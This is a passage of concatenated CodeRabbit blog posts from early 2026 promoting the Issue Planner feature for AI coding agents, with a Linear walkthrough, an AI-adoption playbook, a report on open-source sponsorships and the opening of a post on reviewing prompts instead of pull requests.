Linear, Jira, and GitHub Issues) and helps teams plan *before* any code is written. 1. When an issue is created, CodeRabbit’s context engine automatically builds a **Coding Plan**. It outlines how the work should be approached, identifies which parts of the codebase are likely to change, and breaks complex requirements into clear phases and tasks that an AI coding agent can execute. 2. That plan is enriched with real context: past issues and PRs, organizational knowledge from tools like Notion or Confluence, and relevant details pulled directly from your codebase. 3. The result is a structured, editable plan and a high-quality prompt package, ready to run in your IDE or via CLI tools. 4. Before anything is generated, your team can review the plan, refine assumptions, and iterate on the prompt together. Every version is saved, so decisions and intent don’t get lost over time. 5. When you’re ready, CodeRabbit hands the finalized prompt off to the coding agent of your choice. Then, generation starts with clarity, not guesswork. The outcome: faster planning, better prompts, fewer misunderstandings, and a development process aligned around shared intent from the very beginning. ## **Measure what actually matters** It’s easy to focus on more talked about parts of AI adoption. That’s why so many teams focus on things like: model quality, speed, and how impressive the output looks in isolation. But the teams that succeed with AI aren’t the ones chasing the agent with the best benchmark score. They’re the ones refining their processes to reduce rework, minimize confusion, and keep alignment cheap by planning effectively together. In the AI era, coding is becoming easier. The real work is shifting left towards planning and, at CodeRabbit, we’re here to help. ***Learn more and*** [***try Issue Planner today!***](https://coderabbit.link/kenhuQw)

Issue Planner: Collaborative planning for teams using coding agents

Parth Gandhi — Tue, 10 Feb 2026 00:00:00 GMT

For decades, the software development lifecycle has followed a familiar timeline. You create an issue, assign the work, manually write the code, get several peers to review it, test it, and ship. Each step took a relatively predictable amount of time and effort. You could find efficiencies but only to a degree. Then, AI coding agents came and exploded that timeline. At CodeRabbit, we’ve seen firsthand how AI shifted the backlog from writing code to reviewing and testing code. That’s why we launched our [PR Reviews product](https://www.coderabbit.ai/). When AI also created the need to review code locally while working on code with an agent, we launched our [IDE](https://www.coderabbit.ai/ide) and [CLI](https://www.coderabbit.ai/cli) code review tools. Lately, we’ve been seeing another problem. With coding agents in the loop, writing code is no longer the slowest or most critical part of the process. Planning is. Intent is. Alignment is. ## Why we’re taking on planning… (Hint: We see a lot of slop in reviews) The cost of being even slightly unclear about things like scope, assumptions, or success criteria has huge implications later on in the workflow when agents are involved… like in reviews where we were seeing a lot of slop and rework required 👀. But it also means needing to iterate on prompts until the agent gets it right and extensively reworking generated content. What’s more, creating effective prompts with the right context and intent is time consuming, creates issues with adoption of AI tools and generates uneven outcomes across teams due to differences in prompting skills and approach. Increasingly, developers are hungry for ways to streamline the planning process and to shift collaboration left by reviewing prompts before code is written. That’s why we’re **launching the beta for CodeRabbit Issue Planner.** We’re leveraging the same industry-leading context engine we use in our code reviews to help teams create plans, automate the drafting of prompts, and collaborate to ensure alignment. ## The challenge: Planning in the AI era ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d284e2e411425cb28e3defa8c684b4855911fce546260678f32b68093ebcbf95_b8e89ab6bc.png) Today, teams spend more time prompting, re-prompting, and correcting AI-generated code than they ever expected. Prompts have grown longer as developers learned that being more specific helps increase output quality. Context is a big part of that but it has to be brought in from scattered docs, tickets, and Slack threads. If you don’t take the time to add it, agents make assumptions. Often not the right ones. The same goes with intent. Clear intent is the difference between your agent building the right thing instead of “something.” The result of these prompting challenges is rework, “AI slop,” and frustration. Good prompting is complicated, time consuming, and hard to do well. It requires: * Decomposing ambiguous problems * Specifying interfaces and acceptance criteria * Providing the right context at the right time * Building tight feedback loops * Designing for safety (including security, privacy, reliability) Meanwhile, on any team there’s always some teammates who know how to guide agents well and others who don’t. That creates uneven output quality, more review overhead, and stalled adoption. After all, if you have to rework the code every time because your prompt isn’t specific enough, it often seems like it’s faster to just write the code yourself. ## How our Issue Planner works %[https://youtu.be/zHlgipben70] Our Issue Planner is a new workflow that happens collaboratively within your issue tracker and helps teams define scope, assumptions, and success criteria together – before any code is written. While other tools have tried to tackle AI planning, they’ve done it in a disconnected way that doesn’t allow for team alignment or doesn’t bring in the right context. With AI coding agents, planning can no longer live in people’s heads, scattered tickets, or half-remembered conversations. It has to be explicit, shared, reviewable, and machine-readable. Instead of treating prompting as a solo activity, our Issue Planner turns planning into a collaborative, reviewable step in your SDLC. ### Issue Planner walkthrough 1) CodeRabbit Issue Planner integrates with your issue tracker to help you plan where issues live (currently available in **Linear, Jira, GitLab Issues, and GitHub Issues).** **2)** When an issue is created, CodeRabbit’s industry-leading context engine gets to work. It starts by creating a Coding Plan. That includes: * Sharing a high-level overview of how we will research and approach the task. * Pinpointing the files that need to change. * Breaking complex product requirements into multiple phases and tasks for an AI Coding Agent to create tasks. * Enriching each phase and task with context gathered from past issues, PRs, organizational context from tools like Notion, Confluence, and others. 3) This creates an editable, structured Coding Plan and consumable prompt package that can be executed on IDE or CLI tools or shared with a coding agent. You can give feedback, refine the assumptions the tool made, and regenerate the plan. 4) You and your team can review and refine the prompt before any code is written. Versions of the prompt are stored for future reference and use. 5) When ready, CodeRabbit hands off the prompt to the coding agent of your choice. This process saves you time, automates planning, improves your prompt output, and allows your team to align on intent in order to streamline the rest of the software development lifecycle. [Learn more in Docs](https://docs.coderabbit.ai/issues/planning) ## How our Issue Planner helps teams ![](https://victorious-bubble-f69a016683.media.strapiapp.com/520106ebd615f6970bbc7a410da2165c6e5efb2fd6f1437969d856d79c32765f_8cb4eda7db.png) For the last several months, Issue Planner has been available to select CodeRabbit customers. Teams using it saw immediate improvements. * **Accelerated workflows:** CodeRabbit highlights both what needs to change and how to change it, so teams spend less time orienting themselves and more time actually shipping. Instead of reverse-engineering intent from a ticket or PR, engineers and agents start with a clear plan. * **Better intent → better output:** Agents receive explicit requirements, assumptions, and constraints up front. That clarity translates directly into higher-quality output, code that matches team standards, respects architecture decisions, and solves the right problem the first time. * **Increased AI adoption:** By leveling the playing field around prompting and planning, CodeRabbit makes agents usable for the whole team, not just power users. Less reliance on “AI whisperers,” fewer bottlenecks, and more consistent results across engineers. * **Reduced rework:** Clear plans mean fewer back-and-forth prompt cycles, less cleanup, and fewer PRs that are *technically correct but functionally wrong*. Teams spend less time undoing AI output and more time moving forward. * **Less slop:** Better planning reduces hallucinations, spaghetti code, and invented requirements. When agents are grounded in real context and agreed-upon intent, output stays focused, readable, and maintainable. * **Real collaboration:** Planning doesn’t happen in isolation. CodeRabbit Issue Planner brings humans into alignment before agents execute. That way, decisions are shared, assumptions are visible, and the whole team agrees on the plan before any code is written. ## But… why Collaborative Planning and prompt reviews? ### Limitations of planning directly with agents Many AI coding tools encourage you to plan directly with an agent inside your editor, treating planning as a private, one-to-one interaction between a developer and an AI coding agent. In that scenario, requirements, assumptions, and constraints are only accessible to one person or are loosely implied in a prompt that no one else ever sees. AI coding agents also often don’t have the codebase context needed to create a comprehensive plan. When planning is rushed, under-specified or lacks proper context, agents do what they’re designed to do: fill in the gaps. The result is often code that looks coherent but quietly drifts from team standards, architectural decisions, or product intent. Without shared visibility or early feedback, misalignment isn’t discovered until a PR review, after time has already been spent generating, fixing, and reworking code. ### Why we chose Collaborative Planning That’s why we chose a different direction: planning that’s collaborative, reviewable, and shared, so teams can agree on intent before agents ever start writing code. Collaborative planning turns intent into a shared artifact the whole team can align on before execution begins. By reviewing and refining prompts together via prompt reviews, assumptions become explicit, constraints are clarified, and decisions are made deliberately rather than inferred. Agents stop guessing and start executing against clear instructions, producing output that’s more predictable, usable, and aligned with how the team actually builds software. In this model, prompting is no longer a personal skill for a few power-users. It becomes a team competency that scales, reduces rework, and allows agents to operate more reliably within agreed-upon boundaries. Another key benefit of planning collaboratively in your issue tracker also means that developers aren’t locked into one agent or editor. They can choose the coding agents that work best for them. ## What’s next? Roadmap for CodeRabbit Issue Planner We’re just getting started with our Issue Planner. We are building additional capabilities that will help developers collaborate more effectively, operationalize strong plans, and compound organizational knowledge over time. Here’s just two things to look forward to: * **Deeper collaboration and better prompt review workflows:** We’ll be expanding support for more team collaboration directly within Issue Planner, including the ability to add discussion threads, activity and decision logs, and explicit approval checkpoints for plans and prompts. The goal is to make intent review a shared, auditable process, closer to a Google Docs–style collaboration experience than a one-off prompt. * **Prompt repos that functions as “blueprints” for your code:** Our goal is to create a repo of the specs, design choices, and prompts that went into creating your codebase. This will function as a source of truth around the design directions and choices made and allow your team to more easily revisit decisions or tweak files without having to start from scratch. ## **Get started** ***CodeRabbit Issue Planner is available today in Linear, Jira, GitLab Issues, and GitHub Issues.*** [***Try it now.***](https://coderabbit.link/MW7YCkT)

How to effectively plan issues on Linear using CodeRabbit Issue Planner

Aleks Volochnev — Tue, 10 Feb 2026 00:00:00 GMT

There's a gap between a ticket and meaningful code. Your ticket says, "Add dark mode support." Great, but *what does that actually mean in code?* Which files need changes? What patterns does the codebase already use for theming, and are there shared utilities you should extend? Tickets describe the *what*. Someone still has to figure out the *how*, by diving into the codebase and tracing dependencies. That's the slow, unglamorous work that makes or breaks the implementation. You can't skip it, unless you enjoy rewriting things three times. "Ask your coding agent to plan it?" Sure, Claude or Cursor will happily generate one in ten seconds flat. It looked at a dozen files max and definitely didn't notice that related issue your teammate closed three weeks ago (while you were on vacation), the one where the team decided on a specific state management approach for exactly this kind of thing. These fast plans can be confidently wrong in ways you won't discover until you're deep in implementation or even review. And even if it *were* solid, it lives in your agent's context window, your colleague who knows the settings screen is about to be refactored never gets to weigh in. That’s where CodeRabbit Issue Planner comes in. It reads the issue, goes through relevant related issues for context, and combines that with its deep, continuously-built knowledge of your codebase: the source code dependency graph, established patterns, and previous architectural decisions. Out comes a Coding Plan: research results, design choices with rationale, phased tasks, and detailed agent-ready prompts you can hand off to whatever agent you use. Gathering the *right* context takes time, but I'd rather have a great plan in a few minutes than a confidently wrong one in a few seconds. ![There is a special place in hell for people who write tickets like that, right?](https://victorious-bubble-f69a016683.media.strapiapp.com/4397e9e665876b231a35877b09fdca021e2aabbd25a0c4aa55d5111e15166fec_2be8a7b8f5.png) *There is a special place in hell for people who write tickets like that, right?* ## **Triggering a plan** The simplest way to get a plan is to comment @coderabbitai plan on an issue. A few minutes later, CodeRabbit replies with a link to your Coding Plan. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c8b5d71236befea9c7612435d57bee878d5f14b53697a881ce6929e4f254d140_a6862770dc.png) *My planning process: one comment, one coffee, one plan.* But the real power comes from Auto-Planning. In the CodeRabbit web app, get to the **Plans** tab and set up rules that automatically trigger planning when issues match certain conditions. You can filter by issue type, labels, assignee, or status, and combine them however you like. For example: "Plan every bug assigned to me that moves to In Progress." Set it up once, and every time you pick up a ticket, the plan is already waiting for you. One more thing: since Linear issues aren't tied to a specific repository, CodeRabbit needs to figure out which codebase to analyze. It can usually detect this on its own, but the most reliable approach is to specify the repository directly in your planning rule. No guessing, no extra comments. ![IF (ready-for-plan) THEN (rabbit does the planning) ELSE (you do the planning at 2am)](https://victorious-bubble-f69a016683.media.strapiapp.com/ceb67ee70c57f47ccb7db05ffa59ea4ad3893c52073d66ba066e10f5c9fa17e5_4a80d348db.png) I*F (ready-for-plan) THEN (rabbit does the planning) ELSE (you do the planning at 2am)* ## **What's in a plan** The plan lives in the CodeRabbit web app. Click the link in CodeRabbit's comment on the issue to open it. Here's what you'll find: ### **Summary** A concise overview of the implementation approach, tailored to your architecture and conventions. ### **Research** Deep codebase analysis: relevant files, existing patterns, dependencies, and architectural decisions that affect this work. This is the context you'd otherwise spend an hour gathering manually (or that your coding agent would skip entirely). ### **Design Choices** For each significant decision, you get the concern, the options that were considered, and which option was chosen, along with the rationale. "Three-way selector (light/dark/system)" instead of a simple toggle? Here's why. Creating a dedicated themes/ directory for the visuals? Here's the reasoning. These are the decisions worth reviewing with your team before anyone writes a line of code. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/882d822fc4d73a758015c65a1164cf5ae94688c57e32af3a5e7045e293d2cce2_fc9db34a0c.png) *‘The hour of reading code before writing code’ part, done for you* ### **Phased Tasks** The implementation broken into logical, shippable chunks. Each phase groups related changes that make sense to build and test together. Phase 1 might lay the foundation (AsyncStorage and ThemeProvider).Phase 2 integrates it at the app level. Phase 3 migrates existing components. ![Your agent's favorite kind of prompt: the very specific one.](https://victorious-bubble-f69a016683.media.strapiapp.com/6a3365a94c0a88eeb9813c7814096c512585a8caafe12219bf91f49010684a12_f0896bd3c8.png) *Your agent's favorite kind of prompt: the very specific one.* ### **Agent-Ready Prompts** Machine-readable instructions for your coding agent, available per phase or as a combined prompt. Not the vague suggestions, but real, applicable instructions. They reference specific files, follow your project's patterns, and include the edge cases your agent should handle. ![Specific file paths, actual type definitions: no more “can I haz dark mode pls?”](https://victorious-bubble-f69a016683.media.strapiapp.com/1f2c2171d0b06ac4a6830508b63343438e1160a13992469f36740a1f7b7e7311_84e99cea51.png) *Specific file paths, actual type definitions: no more “can I haz dark mode pls?”* ### **Refining through chat** The plan editor has a chat panel on the right side. Use it to ask questions about the plan, challenge design choices, or request changes. Don't like that the plan chose option 2 for a design decision? Tell CodeRabbit you'd prefer option 3, and explain why. Want more detail on a specific step? Just ask. When you're happy with the feedback you've given, hit **Redo Plan**. CodeRabbit regenerates the plan incorporating your notes. Every version is preserved, so if a re-plan goes sideways, you can roll back to a previous version. For smaller issues, your own knowledge might be enough. For anything non-trivial, I'd encourage sharing the plan with your team. Send the link to your colleagues and let them poke holes in it. A Product Owner reviewing the plan *before* implementation starts can save everyone a painful "that's not what I meant" moment a week later. Plans are collaborative by design: anyone in your organization can view them, chat about them, and trigger re-plans. ![Rubber ducking except the duck answers back](https://victorious-bubble-f69a016683.media.strapiapp.com/1eabaed80b07f49456a9407907aa0d5fe87b4deb8b5937a2aaa4a779ac454398_2a759eb363.png) *Rubber ducking except the duck answers back* ## **Handing off to your coding agent** Once you're satisfied with the plan, select the phases you want to work on and click **IDE Handoff**. If you have the CodeRabbit IDE extension installed (VS Code, Cursor, Windsurf, or any compatible editor), the agentic prompts land directly in your coding agent's input field, ready to execute. Pick your IDE from the dropdown and go. No IDE extension? Hit **Copy prompt** to grab the prompts as text and paste them into Claude Code, GitHub Copilot, or whatever tool you prefer. Same prompts, same quality, just a manual paste. ![Three down, your favorite is [probably] next.](https://victorious-bubble-f69a016683.media.strapiapp.com/2a22c1a980b2e0b0d150955dbf4069bd729c41c3ffdee694ed282e4493212ccc_16a361eb2e.png) *Three down, your favorite is \[probably\] next.* ## **Getting started** If you're new to CodeRabbit, start by installing it on your repositories (GitHub, GitLab, Bitbucket, or Azure DevOps are all supported). The [quickstart guide](https://docs.coderabbit.ai/getting-started/quickstart) walks you through the setup in under five minutes. Already using CodeRabbit for code reviews? You're halfway there. Head to the CodeRabbit dashboard, go to **Integrations**, and connect your Linear workspace. This unlocks Issue Planner, but it's also worth doing for code review. CodeRabbit will validate your pull requests against the acceptance criteria in linked Linear issues, catching gaps that people often miss. Once Linear is connected, comment @coderabbitai plan on any issue. Your first Coding Plan will be ready in a few minutes. From there, set up Auto-Planning rules so plans are waiting for you before you even open the ticket. ## **Why CodeRabbit Issue Planner** Linear handles the *what* and *when*. CodeRabbit Issue Planner now handles the *how*. Unlike asking your coding agent for a quick plan, you get one that's actually grounded in your codebase, informed by related issues, and reviewed by your team before a single line of code is written. CodeRabbit is free for open-source projects and comes with a free trial for private repositories. Give it a spin on a real issue and see how the plan compares to what you'd get from your agent alone. ***Learn more and*** [***try Issue Planner today.***](https://coderabbit.link/cfr8wBf)

It's not enough to buy an AI subscription: A realistic adoption playbook

Aleks Volochnev — Fri, 06 Feb 2026 00:00:00 GMT

> *A decade ago I led a DevOps transformation in a German company: clouds, containers, a lot of automation. I thought tooling would be the hardest part of the transition: little did I know. Neither Kubernetes configs nor CI/CD pipelines were the hard part, getting people to believe in the change and accept new processes were. We cut time-to-market from months to weeks and saved millions by moving from manual to automated testing, but only after winning hearts and minds.* ***AI adoption is the same story, different decade.*** Every week, I talk to teams who bought [Google](https://www.coderabbit.ai/blog/gemini-3-for-code-related-tasks-the-dense-engineer) or [Claude](https://docs.coderabbit.ai/cli/claude-code-integration) subscriptions expecting magic. What they got was a glitchy autocomplete and a lot of confusing results. The gap between "we have AI tools" and "we ship better software faster because of AI" is wider than vendors want you to believe. I've collected the pitfalls people forget to consider or completely misunderstand when adopting AI-assisted development. If you're planning to make the jump or have tried and weren't excited with the results, this is for you. There's no magic button: every process change requires understanding and planning. Consider this a playbook born from many failures (and some tears). ## Pitfall 1: Can your team actually use these AI tools? (Skill gap) *You can buy a Formula 1 racing car, but putting your Uber driver behind the wheel without track training won't get you to the office, more likely, to the hospital.* **The problem:** Using AI looks simple. Just chat with the bot until it’s done, right? This simplicity is very deceptive! Prompting is a skill and bad prompts produce bad output, no matter how expensive your fancy [Opus 4.5](https://www.coderabbit.ai/blog/opus-45-for-code-related-tasks-performs-like-the-systems-architect) is. Knowing how to use AI (and when not to use it at all) is expertise that takes time to develop. Without it, you're paying for a car nobody knows how to drive. **Quick diagnostic:** Ask your engineers: "What's the system prompt? Context poisoning?" If you get blank stares, you have a skill gap. Understanding context engineering is the key to getting real value from AI tools and most developers haven't been taught it. There are still plenty of people who do not understand the difference between an agent and the LLM model it uses under the hood! **What helps** * Start with a brief skill assessment. Who's already using AI tools effectively? These people will be invaluable in this journey! * Dedicate actual learning time and host or run a course. "Figure it out on your own," isn't a training program. * Let early adopters lead. Peer recommendations beat external trainers every time. Internal lunch-and-learns work better than vendor webinars (and cost less!) * Team up early adopters with AI novices. Pair programming sessions where experienced users tackle real problems on your own project - nothing can beat that. ## Pitfall 2: Who chose this tool... And why!? (the top-down tool problem) *"Yesterday we bought XYZ for everyone. Use it, you ungrateful creatures."* **The problem:** Management picks a tool based on marketing demos, mandates it overnight. No evaluation against the team's actual workflow. Developers feel unheard. The tool might not fit the stack, the workflow, or individual preferences. Resistance grows among the team and now the pushback is about autonomy, not the tool itself. In these cases, adoption fails, the budget gets wasted, the team is annoyed. To make matters worse, the landscape is indeed confusing. There are full AI-native [IDEs](https://www.coderabbit.ai/ide) ([Cursor](https://www.coderabbit.ai/cursor), [Windsurf](https://www.coderabbit.ai/windsurf)), extensions for existing IDEs (Roo Code, [GitHub Copilot](https://www.coderabbit.ai/blog/github-copilot-best-practices-10-tips-and-tricks-that-actually-help), Cline), provider-locked versus provider-agnostic options, subscription-based versus consumption-based, chat interfaces versus inline completion versus agentic workflows. No single "best" choice exists. If you want me to tell you "just use X and Y" - my apologies but I won’t do that. I'm not here to sell you some agents. It's a decision you need to make together with your team. **Quick diagnostic:** Run an anonymous poll: are developers satisfied with AI tooling? Did they have a voice in AI tool selection? "Enterprise decided for us" doesn't drive adoption. **What helps** * Ask what your team is already using. Some certainly are already deep into AI adoption either for your projects or their hobby projects. * Run lightning demos where team members show different tools for 5 minutes each. * Invest time in tool selection. Make sure to show and demo options and let the team have a real voice. * Accept that the "best" solution depends on stack, workflow, budget, and personal preference. ## Pitfall 3: Do you really trust this code? (blind trust trap) *AI is like an overly confident intern: sounds right, might be deadly wrong.* **The problem:** AI-generated code often looks correct and passes superficial reviews. Our own data shows AI-generated code [has 1.7x more bugs](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report) than human-written code. Subtle issues like security holes, performance problems, and edge cases can be there and will be there, but verifying someone else's code is cognitively hard, and the more code AI produces, the worse this gets. So, people tend to skip verification completely or do it too shallowly. "It looks very solid, so it's probably fine" becomes the default, and many programmers tend to push to upstream without proper validation. I explain it in detail in my recent post about how [it's harder to read code than to write it](https://www.coderabbit.ai/blog/its-harder-to-read-code-than-to-write-it-especially-when-ai-writes-it). **The story with bugs:** The earlier you catch them, the cheaper they are to fix. Something comes up while already working on a ticket? A developer is already on the task, with (hopefully) a clear understanding of the requirements, the context, and more. Here, it's a minute to make it right. Let this get through to the pull request, or even worse, to production, and fixing can cost you hours or days of debugging, not to mention unhappy customers. Try to catch potential issues before they reach a formal pull request review, since it's cheaper and faster. **Pre-commit review** is also a highly underestimated part of modern AI-assisted development and many devs don't realize how much it would save their teams. Subscribe, since I'll talk much more about it in future posts! **Quick diagnostic:** Blind trust shows up in one of two ways. Look at your incident reports and your PR metrics side by side. More production bugs recently while AI usage went up? That's blind trust sneaking through. Alternatively, if production is stable but your average "reviewer requested changes" shot through the roof and time-to-merge doubled, congrats, your reviewers are catching the AI-generated mess (but they're drowning in it). **What helps** * Devs can't just "write and push" anymore. Whatever AI wrote is to be thoroughly reviewed - as early as possible. * Treat *pre-commit review* as standard practice and incorporate it into the training program and the overall working culture. * Run automated checks, but not just with linters. Let AI review what another AI wrote. We have [a great tool with a generous free plan!](https://www.coderabbit.ai/ide) * Build a culture of healthy skepticism (not paranoia). The goal isn't to distrust AI, it's to verify before you trust. ![Exposed GitHub Personal Access Token in version control](https://victorious-bubble-f69a016683.media.strapiapp.com/ec59a6b8974087e4584236731a4e9d5a4579b9e91a29c77ed4e59ba1e3b11f78_a46dd84479.png) ## Pitfall 4: More code that needs stricter reviews. Same team. See the problem? *More cars on the highway, and everyone's trying to exit through the same single-lane ramp.* **The problem:** Individual developer velocity goes up when you adopt AI coding tools. But that also means PRs pile up waiting for review. Reviewers, then, become the constraint. AI makes it easy to write more code and larger PRs mean harder reviews. The harder reviews, in order, mean either a slower shipping pace or production incidents, or both. **Quick diagnostic:** Check your PR metrics: has average time-to-review increased in the last 3 months while code volume doubled? That's a bottleneck. Or did time-to-review stay the same despite more code? That might be even worse, because fast shallow reviews lead to production incidents. You want fast and thorough. **What helps** * Automated [first-pass AI reviews](https://www.coderabbit.ai/#features) with immediate feedback. * Fast feedback means the code author still has context; slow human review hours or days later means they've already forgotten half the details. * Authors address automated feedback before a dedicated human reviewer even sees the PR. * Human reviewers focus on architecture, logic, and business context, as well as other things that require judgment. * Faster feedback loops lead to faster merges. ![Move state initialization to compomentDidMount to avoid side effects during render](https://victorious-bubble-f69a016683.media.strapiapp.com/af8b0acff168eaeafdb1e5a2a111547e6e6946acc922d9d852189db3017e9982_aa4c5d384a.png) ***NOTE: AI reviews save significant time and speed up delivery, but they can't and won't replace proper human reviews!*** ## Pitfall 5: Where's the blueprint, Lebowski? (context starvation problem) *AI without context is like a creative contractor without blueprints. It definitely will build something... Most likely not what you needed.* **The problem:** AI tools are only as good as the context they receive. Human developers recover missing context naturally. They get it from things like Slack huddles, coffee machine conversations, and hallway chats. AI can't do that, but instead, it will confidently "invent" the missing parts, and you don't want that. Disconnected tools mean lost context at every handoff. Tribal knowledge (the stuff everyone knows but nobody wrote down) never makes it into an AI’s context. **Quick diagnostic:** Open your last five issues. Do they have acceptance criteria and clear problem statements, or just "fix the bug" and a link that expired three months ago? Check your documentation: when's the last time anyone updated the architecture docs? If the README still mentions the framework you migrated away from two years ago, AI tools are navigating using 17th century maps. **What helps** * Well-written issues with acceptance criteria help make good prompts. * [Linked issues in PRs](https://docs.coderabbit.ai/guides/linked-issues), so context flows through to the AI is also key. Then, AI reviews can validate not only code but also that the code meets requirements and acceptance criteria * Codebase documentation that AI can actually access and reference. * Team knowledge captured in [an accessible form](https://docs.coderabbit.ai/guides/learnings), not just in people's heads. ![Missing platform availability check required by Linear](https://victorious-bubble-f69a016683.media.strapiapp.com/36102ea6dae0c924826cf4bef2e4439cd41ff263baa9decb70e337300f64bf68_6368f02706.png) ## Pitfall 6: "Am I getting fired?" (the people problem) *"Someone's getting fired after this transition."* **The problem:** Fear and resistance, sometimes explicit, often passive. Junior devs worry about job security and tend to over-rely on AI. Senior devs feel their expertise is devalued and often resist (a common comment you’ll find here is, "I'm faster without it"). AI won't replace developers, but developers are scared management still thinks it will and you won't get great results until your team sincerely supports the change, instead of quietly resisting it. Frederick the Great said soldiers should fear their officers more than the enemy. That might work well for 18th-century infantry charges, but it's a terrible model for modern software teams. Fear kills experimentation, hides problems, and drives your best people to update their LinkedIn. You're not running a Prussian army, so don't manage like you are. **Quick diagnostic:** The best approach is to lead bottom-up. Let the team own the initiative, run experiments (some will fail, that's fine), and iterate until you hit something that works. If you hire smart people, there is no need to dictate to them and, if you don't, AI won't help you. **What helps** * Clearly frame AI as an amplifier, not a replacement. * Let early adopters demonstrate value to peers. It's more credible than management saying, "just trust us." * Celebrate what humans do better: judgment, creativity, and understanding are good examples. They are also what the business actually needs. * Involve the team in tool selection and workflow design. * Skeptics often have valid concerns worth addressing. Listen to them. ## Where to start These challenges don't exist in isolation. Training gaps lead to blind trust. Top-down mandates create people problems, making the team resist change. Context starvation makes review bottlenecks worse. Start where it hurts most. For most teams, that's either the skill gap, the blind trust problem (bugs slipping through) or the review bottleneck (PRs piling up). Each of these challenges deserves deeper treatment. We'll dig into pre-commit and pull request review automation strategies and change management in future posts. For now, the key insight is the same one I learned a decade ago: the tools are actually the easy part. The habits, the culture, the workflows - that's where transformations actually happen. **Got thoughts on this? Tell me! Have your own AI adoption stories, shiny wins, or spectacular failures?** [**Hit me up**](https://www.linkedin.com/in/aleks-volochnev/)**! I read and respond to everything. Best insights come from readers who push back or share their own disasters.** *Want to see automated code review in action? Check out how different projects like* [*Langflow*](https://www.coderabbit.ai/case-studies/langflow-boosts-merge-confidence-by-50-with-coderabbit) *and* [*Clerk*](https://www.coderabbit.ai/case-studies/inside-clerks-40-percent-faster-merge-workflow-with-coderabbit) [*use CodeRabbit*](https://app.coderabbit.ai/login???free-trial) *to catch issues before they reach human reviewers.*

We are committed to supporting open source: Distributed $600,000 to open source maintainers in 2025

Santosh Yadav — Wed, 04 Feb 2026 00:00:00 GMT

CodeRabbit recognizes the growing need to support open source software (OSS), especially as AI accelerates the development landscape. While AI makes writing code faster and increases the frequency of pull requests, the time and effort of maintainers remain invaluable. Most open source projects rely on a small number of developers who manage these projects within their limited time. To address this, we provide OSS projects access to CodeRabbit for free. We’ve also made a commitment to giving the OSS community [$1 million in sponsorships.](https://www.coderabbit.ai/blog/coderabbit-commits-1-million-to-open-source) ## Open source funding is broken, we can fix it together At CodeRabbit, we view our support for open source as a vital investment in its future, rather than just "giving back." Open source software forms the foundation upon which most organizations build successful products. We rely on many OSS projects, including [**pnpm**](https://github.com/pnpm/pnpm), [**Biome**](https://github.com/biomejs/biome), and various React-based libraries. Our commitment is to ensure these projects remain sustainable for the long term, enabling widespread consumption and innovation. Critically, we want to make sure maintainers receive the necessary financial support to feel valued by the community and avoid burnout. Even with AI generating code, the use of OSS is not declining. In fact, as exemplified by the impact on major projects like [TailwindCSS](https://tailwindcss.com/) and [tldraw](https://www.tldraw.com/), AI is expected to significantly increase the download rates for widely used open source projects. We are proud to join the [open source pledge](https://opensourcepledge.com/join/) and formally commit to supporting open source software. ## CodeRabbit‘s effort in 2025 In 2025, CodeRabbit demonstrated its strong commitment to the open-source community by distributing over $600,000 in sponsorships, in addition to offering a free tier for open-source projects. This significant funding is part of our effort to support maintainers who continue to spend valuable time reviewing pull requests, a burden that is often exacerbated by the ongoing influx of AI-generated contributions to OSS projects. Further details on how CodeRabbit distributed more than $600,000 to various projects are available below. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/05345cea8e6dbceda9273b451ff7450540a7d1d0acc45dbd8da231381a08e279_de7cfbdebc.png) Part of our commitment to open source is sponsoring developers on GitHub, where we were able to support 18% of the maintainers for the packages CodeRabbit relies on directly. We're planning to boost that support even more in 2026. In the first quarter of 2026 we are giving away $100,000 to the tools we and members of our community rely on. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/f6a5eda745b540a57c7b540142a12ef599cfead1abb7fd13e31b943e6f79da1e_5d72bd43bc.png) We sponsored 74 devs and distributed around $267,000 using [GitHub sponsors](https://github.com/orgs/coderabbitai/sponsoring) and [open collective](https://opencollective.com/coderabbit). We directly collaborated with maintainers to distribute the remaining $360,000+ in funding. Our commitment to open source continues as we launch the [CodeRabbit oss program](https://docs.google.com/forms/d/e/1FAIpQLScBYzbvjENJLHnMreturAwXZI_90mUPIBonseala1ZAcTeOGw/viewform), which is part of our commitment to giving [$1 million to the open source community](https://www.coderabbit.ai/blog/coderabbit-commits-1-million-to-open-source).

Show me the prompt: What to know about prompt requests

Aravind Putrevu — Fri, 23 Jan 2026 00:00:00 GMT

In the 1996 film Jerry Maguire, Tom Cruise’s famous phone call, where he shouts “Show me the money!” cuts through everything else. It’s the moment accountability enters the room. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/9440fb7738c63b31092688e2f1b7f2f540c551b53ccbd8cfd7eef76b84e111f6_7bc70c99ca.jpg) In AI-assisted software development, “show me the prompt” should play a similar role. As more code is generated by large language models (LLMs), accountability does not disappear. It moves upstream. The question facing modern engineering teams is not whether AI-generated code can be reviewed, but where and how review should happen when intent is increasingly expressed before code exists at all. ## The Twitter debate: Prompts versus pull requests Earlier this week, Gergely Orosz of [Pragmatic Engineer](https://www.pragmaticengineer.com/) shared a quote on Twitter (or X, if you prefer) from an upcoming podcast with [Peter Steinberger](https://steipete.me/), creator of the self-hosted AI agent [Clawdbot](https://github.com/clawdbot/clawdbot). [![](https://victorious-bubble-f69a016683.media.strapiapp.com/63826acfe2487cd3cab492aa997b1a99e036d94fd9afbb8b1511cd46a114aac8_12752bc74e.png)](https://x.com/GergelyOrosz/status/2010683228961509839?s=20) Steinberger’s point was straightforward but provocative: as more code is produced with LLMs, traditional pull requests may no longer be the best way to review changes. Instead, he suggested, reviewers should be given the prompt that generated the change. That idea quickly triggered a polarized response. Supporters argued that reviewing large, AI-generated diffs is becoming increasingly impractical. [![](https://victorious-bubble-f69a016683.media.strapiapp.com/71de8b15ca402cdd94ab954b024ab58420355235707258f757b23fefa6f405ec_d9a1b01544.png)](https://x.com/kieranklaassen/status/2010843579841986904?s=20) From their perspective, the prompt captures intent more directly than the output. It tells reviewers what the developer was trying to accomplish, what constraints they set, and what scope they intended. In addition, a prompt can be re-run or adjusted, which makes it easier to validate the approach without combing through thousands of lines of generated code. Critics, however, pointed to issues that prompts alone do not solve: determinism, reproducibility, git blame, and legal accountability. 